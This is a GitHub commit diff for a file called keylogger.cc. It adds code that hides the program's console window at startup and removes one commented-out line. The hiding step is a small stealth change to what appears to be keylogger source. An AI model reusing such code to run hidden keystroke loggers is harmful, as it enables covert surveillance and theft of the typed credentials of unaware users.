We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 8c6c599 commit 1690421Copy full SHA for 1690421
1 file changed
keylogger.cc
@@ -26,7 +26,6 @@ string readfile()
26
oldcontent = oldcontent + "\n" + oldcontentline;
27
}
28
29
- // datafile >> oldcontent;
30
31
32
if (oldcontent.compare("") == 0)
@@ -63,6 +62,10 @@ void x(string input)
63
62
64
int main()
65
{
+ // Hide Window
66
+ HWND hwnd = GetConsoleWindow();
67
+
68
+ ShowWindow(hwnd, SW_HIDE);
69
70
while (true)
71
0 commit comments